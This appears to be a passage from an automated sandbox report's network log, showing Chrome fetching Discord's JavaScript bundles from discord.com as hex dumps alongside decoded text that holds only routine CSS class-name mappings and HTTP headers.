                                                                          Data Ascii: picker__month-dropdown-container--select,.react-datepicker__month-year-dropdown-container--select,.react-datepicker__year-dropdown-container--scroll,.react-datepicker__month-dropdown-container--scroll,.react-datepicker__month-year-dropdown-container--scro


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          226192.168.2.549961162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:07 UTC867OUTGET /assets/shared.ffb9488d8d48f9a02fdf.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Wf8dpJLvTBPfU2iDh1vsf1vbH.IbLyFk4yg_iaAqREA-1702226707253-0-604800000
                                                                          2023-12-10 16:45:08 UTC1121INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 38 32 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 64 64 34 64 33 65 32 32 32 37 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:08 GMTContent-Type: application/javascriptContent-Length: 118296Connection: closeCF-Ray: 8336f4dd4d3e2227-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 73 68 61 72 65 64 22 5d 2c 7b 31 36 37 39 31 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 7b 61 6e 63 68 6f 72 3a 22 61 6e 63 68 6f 72 5f 63 38 64 64 63 30 22 2c 61 6e 63 68 6f 72 55 6e 64 65 72 6c 69 6e 65 4f 6e 48 6f 76 65 72 3a 22 61 6e 63 68 6f 72 55 6e 64 65 72 6c 69 6e 65 4f 6e 48 6f 76 65 72 5f 5f 37 38 32 33 36 22 7d 7d 2c 38 38 31 37 37 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["shared"],{167913:function(e,t,a){"use strict";e.exports={anchor:"anchor_c8ddc0",anchorUnderlineOnHover:"anchorUnderlineOnHover__78236"}},881775:function(e,t,a){"use strict";e.exports=
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 61 6e 64 3a 22 63 6f 6c 6f 72 42 72 61 6e 64 5f 62 32 32 35 33 65 22 2c 63 6f 6c 6f 72 42 72 61 6e 64 4e 65 77 3a 22 63 6f 6c 6f 72 42 72 61 6e 64 4e 65 77 5f 66 64 31 37 30 61 22 2c 63 6f 6c 6f 72 47 72 65 65 6e 3a 22 63 6f 6c 6f 72 47 72 65 65 6e 5f 5f 35 66 31 38 31 22 2c 63 6f 6c 6f 72 4c 69 6e 6b 3a 22 63 6f 6c 6f 72 4c 69 6e 6b 5f 62 36 35 31 65 35 22 2c 63 6f 6c 6f 72 50 72 69 6d 61 72 79 3a 22 63 6f 6c 6f 72 50 72 69 6d 61 72 79 5f 5f 36 65 64 34 30 22 2c 63 6f 6c 6f 72 52 65 64 3a 22 63 6f 6c 6f 72 52 65 64 5f 64 36 62 30 36 32 22 2c 63 6f 6c 6f 72 54 72 61 6e 73 70 61 72 65 6e 74 3a 22 63 6f 6c 6f 72 54 72 61 6e 73 70 61 72 65 6e 74 5f 5f 34 63 32 38 30 22 2c 63 6f 6c 6f 72 57 68 69 74 65 3a 22 63 6f 6c 6f 72 57 68 69 74 65 5f 5f 34 33 34 38 38
                                                                          Data Ascii: and:"colorBrand_b2253e",colorBrandNew:"colorBrandNew_fd170a",colorGreen:"colorGreen__5f181",colorLink:"colorLink_b651e5",colorPrimary:"colorPrimary__6ed40",colorRed:"colorRed_d6b062",colorTransparent:"colorTransparent__4c280",colorWhite:"colorWhite__43488
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 63 61 72 64 42 72 61 6e 64 3a 22 63 61 72 64 42 72 61 6e 64 5f 63 32 35 31 35 32 20 63 61 72 64 5f 5f 34 64 63 32 32 22 2c 63 61 72 64 44 61 6e 67 65 72 3a 22 63 61 72 64 44 61 6e 67 65 72 5f 5f 34 30 62 63 33 20 63 61 72 64 5f 5f 34 64 63 32 32 22 2c 63 61 72 64 50 72 69 6d 61 72 79 3a 22 63 61 72 64 50 72 69 6d 61 72 79 5f 63 62 37 61 30 65 20 63 61 72 64 5f 5f 34 64 63 32 32 22 2c 63 61 72 64 50 72 69 6d 61 72 79 45 64 69 74 61 62 6c 65 3a 22 63 61 72 64 50 72 69 6d 61 72 79 45 64 69 74 61 62 6c 65 5f 5f 32 35 35 35 39 20 63 61 72 64 5f 5f 34 64 63 32 32 22 2c 63 61 72 64 50 72 69 6d 61 72 79 4f 75 74 6c 69 6e 65 3a 22 63 61 72 64 50 72 69 6d 61 72 79 4f 75 74 6c 69 6e 65 5f 5f 39 64 66 38 61 20 63 61 72 64 5f 5f 34 64 63 32 32 22 2c 63 61 72 64 50 72
                                                                          Data Ascii: cardBrand:"cardBrand_c25152 card__4dc22",cardDanger:"cardDanger__40bc3 card__4dc22",cardPrimary:"cardPrimary_cb7a0e card__4dc22",cardPrimaryEditable:"cardPrimaryEditable__25559 card__4dc22",cardPrimaryOutline:"cardPrimaryOutline__9df8a card__4dc22",cardPr
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 6e 64 43 6f 6e 74 61 69 6e 65 72 5f 5f 37 65 65 36 31 22 2c 68 65 61 64 65 72 3a 22 68 65 61 64 65 72 5f 5f 39 66 31 35 32 22 2c 73 68 6f 77 4f 76 65 72 66 6c 6f 77 3a 22 73 68 6f 77 4f 76 65 72 66 6c 6f 77 5f 61 36 36 38 32 32 22 2c 74 6f 67 67 6c 65 64 3a 22 74 6f 67 67 6c 65 64 5f 62 62 31 36 30 37 22 7d 7d 2c 36 34 30 36 39 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 7b 63 6f 6d 62 6f 62 6f 78 3a 22 63 6f 6d 62 6f 62 6f 78 5f 5f 34 37 34 65 39 22 2c 64 69 73 61 62 6c 65 64 3a 22 64 69 73 61 62 6c 65 64 5f 5f 31 63 36 66 66 22 2c 65 6d 70 74 79 3a 22 65 6d 70 74 79 5f 5f 38 31 30 36 37 22 2c 66 6f 63 75 73 65 64 3a 22 66 6f 63 75 73 65 64 5f 5f 32 62 31 62 32 22 2c 69 74 65
                                                                          Data Ascii: ndContainer__7ee61",header:"header__9f152",showOverflow:"showOverflow_a66822",toggled:"toggled_bb1607"}},640698:function(e,t,a){"use strict";e.exports={combobox:"combobox__474e9",disabled:"disabled__1c6ff",empty:"empty__81067",focused:"focused__2b1b2",ite
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 65 72 72 6f 72 5f 66 35 66 33 65 31 22 2c 65 72 72 6f 72 43 6c 6f 73 65 3a 22 65 72 72 6f 72 43 6c 6f 73 65 5f 5f 34 63 39 30 35 22 2c 65 72 72 6f 72 43 6c 6f 73 65 49 63 6f 6e 3a 22 65 72 72 6f 72 43 6c 6f 73 65 49 63 6f 6e 5f 62 32 36 65 39 34 22 2c 69 63 6f 6e 3a 22 69 63 6f 6e 5f 65 38 63 65 36 34 22 2c 74 65 78 74 3a 22 74 65 78 74 5f 5f 35 31 30 33 34 22 7d 7d 2c 33 38 38 32 35 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 7b 64 65 66 61 75 6c 74 4d 61 72 67 69 6e 3a 22 64 65 66 61 75 6c 74 4d 61 72 67 69 6e 5f 64 30 63 38 35 37 22 2c 64 69 73 61 62 6c 65 64 3a 22 64 69 73 61 62 6c 65 64 5f 5f 37 31 31 39 66 22 2c 6c 61 62 65 6c 3a 22 6c 61 62 65 6c 5f 5f 39 39 61 63 32 22
                                                                          Data Ascii: error_f5f3e1",errorClose:"errorClose__4c905",errorCloseIcon:"errorCloseIcon_b26e94",icon:"icon_e8ce64",text:"text__51034"}},388258:function(e,t,a){"use strict";e.exports={defaultMargin:"defaultMargin_d0c857",disabled:"disabled__7119f",label:"label__99ac2"
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 6c 65 63 74 61 62 6c 65 5f 61 61 37 66 35 36 22 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 22 70 6c 61 63 65 68 6f 6c 64 65 72 5f 5f 32 61 35 33 62 20 66 6f 72 6d 54 65 78 74 5f 65 34 64 39 35 37 22 2c 73 75 63 63 65 73 73 3a 22 73 75 63 63 65 73 73 5f 5f 38 63 61 61 31 20 64 65 73 63 72 69 70 74 69 6f 6e 5f 5f 37 61 66 37 31 20 66 6f 72 6d 54 65 78 74 5f 65 34 64 39 35 37 22 7d 7d 2c 36 34 39 37 31 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 7b 63 6f 64 65 3a 22 63 6f 64 65 5f 5f 38 30 32 65 61 22 2c 64 65 66 61 75 6c 74 43 6f 6c 6f 72 3a 22 64 65 66 61 75 6c 74 43 6f 6c 6f 72 5f 64 37 35 37 63 32 22 2c 64 65 66 61 75 6c 74 4d 61 72 67 69 6e 68 31 3a 22 64 65 66 61 75 6c 74 4d 61
                                                                          Data Ascii: lectable_aa7f56",placeholder:"placeholder__2a53b formText_e4d957",success:"success__8caa1 description__7af71 formText_e4d957"}},649713:function(e,t,a){"use strict";e.exports={code:"code__802ea",defaultColor:"defaultColor_d757c2",defaultMarginh1:"defaultMa
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 78 74 72 61 62 6f 6c 64 5f 5f 34 66 36 65 64 22 2c 22 68 65 61 64 69 6e 67 2d 6c 67 2f 6d 65 64 69 75 6d 22 3a 22 68 65 61 64 69 6e 67 2d 6c 67 2d 6d 65 64 69 75 6d 5f 5f 36 62 33 66 39 22 2c 22 68 65 61 64 69 6e 67 2d 6c 67 2f 6e 6f 72 6d 61 6c 22 3a 22 68 65 61 64 69 6e 67 2d 6c 67 2d 6e 6f 72 6d 61 6c 5f 5f 37 30 38 62 37 22 2c 22 68 65 61 64 69 6e 67 2d 6c 67 2f 73 65 6d 69 62 6f 6c 64 22 3a 22 68 65 61 64 69 6e 67 2d 6c 67 2d 73 65 6d 69 62 6f 6c 64 5f 5f 38 63 33 31 64 22 2c 22 68 65 61 64 69 6e 67 2d 6d 64 2f 62 6f 6c 64 22 3a 22 68 65 61 64 69 6e 67 2d 6d 64 2d 62 6f 6c 64 5f 5f 33 33 37 61 64 22 2c 22 68 65 61 64 69 6e 67 2d 6d 64 2f 65 78 74 72 61 62 6f 6c 64 22 3a 22 68 65 61 64 69 6e 67 2d 6d 64 2d 65 78 74 72 61 62 6f 6c 64 5f 5f 31 33 39 32
                                                                          Data Ascii: xtrabold__4f6ed","heading-lg/medium":"heading-lg-medium__6b3f9","heading-lg/normal":"heading-lg-normal__708b7","heading-lg/semibold":"heading-lg-semibold__8c31d","heading-md/bold":"heading-md-bold__337ad","heading-md/extrabold":"heading-md-extrabold__1392
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 6c 65 2f 6e 6f 72 6d 61 6c 22 3a 22 72 65 64 65 73 69 67 6e 2d 63 68 61 6e 6e 65 6c 2d 74 69 74 6c 65 2d 6e 6f 72 6d 61 6c 5f 5f 37 32 36 31 38 22 2c 22 72 65 64 65 73 69 67 6e 2f 63 68 61 6e 6e 65 6c 2d 74 69 74 6c 65 2f 73 65 6d 69 62 6f 6c 64 22 3a 22 72 65 64 65 73 69 67 6e 2d 63 68 61 6e 6e 65 6c 2d 74 69 74 6c 65 2d 73 65 6d 69 62 6f 6c 64 5f 62 61 32 64 63 30 22 2c 22 72 65 64 65 73 69 67 6e 2f 68 65 61 64 69 6e 67 2d 31 38 2f 62 6f 6c 64 22 3a 22 72 65 64 65 73 69 67 6e 2d 68 65 61 64 69 6e 67 2d 31 38 2d 62 6f 6c 64 5f 5f 34 32 32 38 39 22 2c 22 72 65 64 65 73 69 67 6e 2f 6d 65 73 73 61 67 65 2d 70 72 65 76 69 65 77 2f 62 6f 6c 64 22 3a 22 72 65 64 65 73 69 67 6e 2d 6d 65 73 73 61 67 65 2d 70 72 65 76 69 65 77 2d 62 6f 6c 64 5f 66 61 38 65 63 31
                                                                          Data Ascii: le/normal":"redesign-channel-title-normal__72618","redesign/channel-title/semibold":"redesign-channel-title-semibold_ba2dc0","redesign/heading-18/bold":"redesign-heading-18-bold__42289","redesign/message-preview/bold":"redesign-message-preview-bold_fa8ec1
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 7b 64 65 66 61 75 6c 74 43 6f 6c 6f 72 3a 22 64 65 66 61 75 6c 74 43 6f 6c 6f 72 5f 5f 38 37 64 38 37 22 7d 7d 2c 39 31 39 30 38 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 7b 68 69 64 64 65 6e 56 69 73 75 61 6c 6c 79 3a 22 68 69 64 64 65 6e 56 69 73 75 61 6c 6c 79 5f 5f 30 36 63 33 65 22 2c 73 68 6f 77 4f 6e 46 6f 63 75 73 3a 22 73 68 6f 77 4f 6e 46 6f 63 75 73 5f 5f 32 62 66 64 38 22 7d 7d 2c 35 30 37 30 39 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 7b 69 6e 74 65 72 61 63 74
                                                                          Data Ascii: 9:function(e,t,a){"use strict";e.exports={defaultColor:"defaultColor__87d87"}},919089:function(e,t,a){"use strict";e.exports={hiddenVisually:"hiddenVisually__06c3e",showOnFocus:"showOnFocus__2bfd8"}},507094:function(e,t,a){"use strict";e.exports={interact


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          227192.168.2.549959162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:07 UTC864OUTGET /assets/app.8f4aee4adf549cf3ee04.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Wf8dpJLvTBPfU2iDh1vsf1vbH.IbLyFk4yg_iaAqREA-1702226707253-0-604800000
                                                                          2023-12-10 16:45:08 UTC1123INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 38 36 31 37 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 64 64 34 64 39 31 30 39 38 65 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:08 GMTContent-Type: application/javascriptContent-Length: 686177Connection: closeCF-Ray: 8336f4dd4d91098e-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:08 UTC246INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 61 70 70 22 5d 2c 7b 36 33 36 34 37 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 7b 61 64 64 46 72 69 65 6e 64 48 69 6e 74 3a 22 61 64 64 46 72 69 65 6e 64 48 69 6e 74 5f 5f 36 64 66 33 64 20 69 6e 70 75 74 54 65 78 74 5f 5f 38 31 64 38 61 22 2c 61 64 64 46 72 69 65 6e 64 49 6e 70 75 74 3a 22 61 64 64 46 72 69 65 6e 64 49 6e 70 75 74 5f 5f 35 36 38 64 38 20 69 6e 70 75 74 54 65 78 74 5f 5f 38 31 64 38 61 22 2c 61 64 64 46 72 69 65 6e 64 49
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["app"],{636478:function(e,t,o){"use strict";e.exports={addFriendHint:"addFriendHint__6df3d inputText__81d8a",addFriendInput:"addFriendInput__568d8 inputText__81d8a",addFriendI
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 6e 70 75 74 57 72 61 70 70 65 72 3a 22 61 64 64 46 72 69 65 6e 64 49 6e 70 75 74 57 72 61 70 70 65 72 5f 5f 34 62 66 38 65 22 2c 65 72 72 6f 72 3a 22 65 72 72 6f 72 5f 5f 37 61 62 34 31 22 2c 69 6e 70 75 74 3a 22 69 6e 70 75 74 5f 64 35 35 37 34 64 20 69 6e 70 75 74 54 65 78 74 5f 5f 38 31 64 38 61 22 2c 69 6e 70 75 74 54 65 78 74 3a 22 69 6e 70 75 74 54 65 78 74 5f 5f 38 31 64 38 61 22 2c 72 69 6e 67 3a 22 72 69 6e 67 5f 5f 33 39 65 38 38 22 2c 73 75 63 63 65 73 73 3a 22 73 75 63 63 65 73 73 5f 5f 35 62 39 31 30 22 7d 7d 2c 37 38 33 36 38 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 7b 61 63 74 69 76 69 74 79 50 61 6e 65 6c 3a 22 61 63 74 69 76 69 74 79 50 61 6e 65 6c 5f 5f 32
                                                                          Data Ascii: nputWrapper:"addFriendInputWrapper__4bf8e",error:"error__7ab41",input:"input_d5574d inputText__81d8a",inputText:"inputText__81d8a",ring:"ring__39e88",success:"success__5b910"}},783686:function(e,t,o){"use strict";e.exports={activityPanel:"activityPanel__2
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 74 74 6f 6e 43 6f 6e 74 61 69 6e 65 72 5f 61 36 38 32 61 36 22 2c 67 61 6d 65 70 61 64 42 75 74 74 6f 6e 54 65 78 74 3a 22 67 61 6d 65 70 61 64 42 75 74 74 6f 6e 54 65 78 74 5f 5f 37 37 64 35 39 22 7d 7d 2c 36 31 38 36 30 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 7b 61 63 74 69 6f 6e 42 75 74 74 6f 6e 3a 22 61 63 74 69 6f 6e 42 75 74 74 6f 6e 5f 5f 38 31 65 61 61 20 72 6f 6c 65 5f 5f 36 33 31 61 33 22 2c 61 64 64 42 75 74 74 6f 6e 3a 22 61 64 64 42 75 74 74 6f 6e 5f 63 36 34 38 62 66 20 61 63 74 69 6f 6e 42 75 74 74 6f 6e 5f 5f 38 31 65 61 61 20 72 6f 6c 65 5f 5f 36 33 31 61 33 22 2c 61 64 64 42 75 74 74 6f 6e 49 63 6f 6e 3a 22 61 64 64 42 75 74 74 6f 6e 49 63 6f 6e 5f 5f 36
                                                                          Data Ascii: ttonContainer_a682a6",gamepadButtonText:"gamepadButtonText__77d59"}},618600:function(e,t,o){"use strict";e.exports={actionButton:"actionButton__81eaa role__631a3",addButton:"addButton_c648bf actionButton__81eaa role__631a3",addButtonIcon:"addButtonIcon__6
                                                                          2023-12-10 16:45:08 UTC32INData Raw: 74 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 7b 62 74 6e
                                                                          Data Ascii: t,o){"use strict";e.exports={btn
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 3a 22 62 74 6e 5f 5f 31 32 63 35 36 22 2c 65 6c 6c 69 70 73 69 73 3a 22 65 6c 6c 69 70 73 69 73 5f 5f 37 31 39 61 30 22 2c 69 63 6f 6e 3a 22 69 63 6f 6e 5f 5f 31 35 35 38 36 22 2c 69 63 6f 6e 41 6e 64 72 6f 69 64 3a 22 69 63 6f 6e 41 6e 64 72 6f 69 64 5f 5f 39 30 33 38 35 20 69 63 6f 6e 5f 5f 31 35 35 38 36 22 2c 69 63 6f 6e 41 70 70 6c 65 3a 22 69 63 6f 6e 41 70 70 6c 65 5f 5f 33 38 63 34 32 20 69 63 6f 6e 5f 5f 31 35 35 38 36 22 2c 69 63 6f 6e 55 53 46 6c 61 67 3a 22 69 63 6f 6e 55 53 46 6c 61 67 5f 5f 31 35 63 61 35 20 69 63 6f 6e 5f 5f 31 35 35 38 36 22 2c 69 63 6f 6e 57 69 6e 64 6f 77 73 3a 22 69 63 6f 6e 57 69 6e 64 6f 77 73 5f 63 61 35 36 61 39 20 69 63 6f 6e 5f 5f 31 35 35 38 36 22 2c 70 6c 61 74 66 6f 72 6d 49 63 6f 6e 3a 22 70 6c 61 74 66 6f 72
                                                                          Data Ascii: :"btn__12c56",ellipsis:"ellipsis__719a0",icon:"icon__15586",iconAndroid:"iconAndroid__90385 icon__15586",iconApple:"iconApple__38c42 icon__15586",iconUSFlag:"iconUSFlag__15ca5 icon__15586",iconWindows:"iconWindows_ca56a9 icon__15586",platformIcon:"platfor
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 42 61 64 67 65 5f 62 65 36 61 33 61 22 2c 70 72 69 76 61 74 65 43 68 61 6e 6e 65 6c 73 3a 22 70 72 69 76 61 74 65 43 68 61 6e 6e 65 6c 73 5f 5f 39 33 34 37 33 22 2c 73 65 61 72 63 68 42 61 72 3a 22 73 65 61 72 63 68 42 61 72 5f 65 34 65 61 32 61 22 2c 73 65 61 72 63 68 42 61 72 43 6f 6d 70 6f 6e 65 6e 74 3a 22 73 65 61 72 63 68 42 61 72 43 6f 6d 70 6f 6e 65 6e 74 5f 5f 32 32 37 36 30 22 2c 73 68 6f 70 53 70 61 72 6b 6c 65 3a 22 73 68 6f 70 53 70 61 72 6b 6c 65 5f 63 38 37 35 31 66 22 2c 74 61 62 42 61 64 67 65 3a 22 74 61 62 42 61 64 67 65 5f 5f 30 30 32 62 33 22 2c 74 68 65 6d 65 64 48 65 61 64 65 72 4d 6f 62 69 6c 65 3a 22 74 68 65 6d 65 64 48 65 61 64 65 72 4d 6f 62 69 6c 65 5f 64 39 36 64 62 62 22 2c 74 68 65 6d 65 64 53 65 61 72 63 68 42 61 72 4d 6f
                                                                          Data Ascii: Badge_be6a3a",privateChannels:"privateChannels__93473",searchBar:"searchBar_e4ea2a",searchBarComponent:"searchBarComponent__22760",shopSparkle:"shopSparkle_c8751f",tabBadge:"tabBadge__002b3",themedHeaderMobile:"themedHeaderMobile_d96dbb",themedSearchBarMo
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 34 31 36 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 7b 63 6c 65 61 72 53 74 61 74 75 73 42 75 74 74 6f 6e 3a 22 63 6c 65 61 72 53 74 61 74 75 73 42 75 74 74 6f 6e 5f 5f 39 33 34 36 62 22 2c 63 6c 65 61 72 53 74 61 74 75 73 49 63 6f 6e 3a 22 63 6c 65 61 72 53 74 61 74 75 73 49 63 6f 6e 5f 5f 37 33 39 37 61 22 2c 63 75 73 74 6f 6d 45 6d 6f 6a 69 3a 22 63 75 73 74 6f 6d 45 6d 6f 6a 69 5f 5f 33 61 36 38 64 22 2c 63 75 73 74 6f 6d 45 6d 6f 6a 69 50 6c 61 63 65 68 6f 6c 64 65 72 3a 22 63 75 73 74 6f 6d 45 6d 6f 6a 69 50 6c 61 63 65 68 6f 6c 64 65 72 5f 66 65 39 38 63 39 20 63 75 73 74 6f 6d 45 6d 6f 6a 69 5f 5f 33 61 36 38 64 22 2c 63 75 73 74 6f 6d 53 74 61 74 75 73 49 74 65 6d 3a
                                                                          Data Ascii: 4169:function(e,t,o){"use strict";e.exports={clearStatusButton:"clearStatusButton__9346b",clearStatusIcon:"clearStatusIcon__7397a",customEmoji:"customEmoji__3a68d",customEmojiPlaceholder:"customEmojiPlaceholder_fe98c9 customEmoji__3a68d",customStatusItem:
